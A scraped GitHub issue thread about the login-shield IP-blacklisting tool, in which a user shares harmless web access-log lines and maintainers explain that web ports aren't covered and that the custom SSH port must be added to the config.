<sld>.<tld>:80 185.156.73.64 - - [01/May/2021:12:51:01 +0200] "GET / HTTP/1.0" 301 673 "-" "\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\""
<sld>.<tld>:80 89.248.170.22 - - [01/May/2021:12:53:10 +0200] "HEAD / HTTP/1.0" 301 341 "-" "-"
<sld>.<tld>:80 91.211.251.148 - - [01/May/2021:12:54:59 +0200] "GET / HTTP/1.1" 301 710 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36,gzip(gfe)"
Don't know what to think of.
from login-shield.
DPsystems
commented on August 26, 2024
Note that unless you're blocking ports 80/443, Login-Shield by default isn't stopping web attacks.
HOWEVER, I AM working on another version called "Web-Shield" with a different set of blacklists to address this issue. I've been testing it now for months and I'm pretty close to making it available.
I think ideally, the web defense needs to be separate from the login-defense. To block web attacks you primarily want to block the web ports from servers, not users, so it needs a bit of a different IP database.
from login-shield.
DPsystems
commented on August 26, 2024
If you're still having issues, remember to note the version/OS you're using. See if you can confirm iptables is logging the blocked requests and what form those log entries are appearing as?
from login-shield.
ychaouche
commented on August 26, 2024
@aakerbeere did you uncomment this line ? otherwise login-shield won't block anything.
from login-shield.
ychaouche
commented on August 26, 2024
@aakerbeere ssh on port 22 ?
from login-shield.
aakerbeere
commented on August 26, 2024
I use different port
from login-shield.
ychaouche
commented on August 26, 2024
Ah, then that's why you don't get anything logged. Add that port to the list (same line). As @DPsystems mentionned, web traffic isn't being monitored, and when I asked about the publicly avaiable services you only mentioned ssh and http. Since http is ruled out, you only have ssh to care about, but you didn't give the correct port number in the config file. Add the relevant port number and re-run.
from login-shield.
aakerbeere
commented on August 26, 2024
Done, ssh ok.
When preparing i was feared to lock myself out. But actually i understand this only to be the case if my public IP is covered by on of the blacklists in use.
thx
from login-shield.
ychaouche
commented on August 26, 2024
Which it totally could, yeah. This makes me think this system has to have a whitelist of some sort, which it apparently doesn't. You can add it by hand, but I can't help on this.
from login-shield.
Related Issues (6)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from login-shield.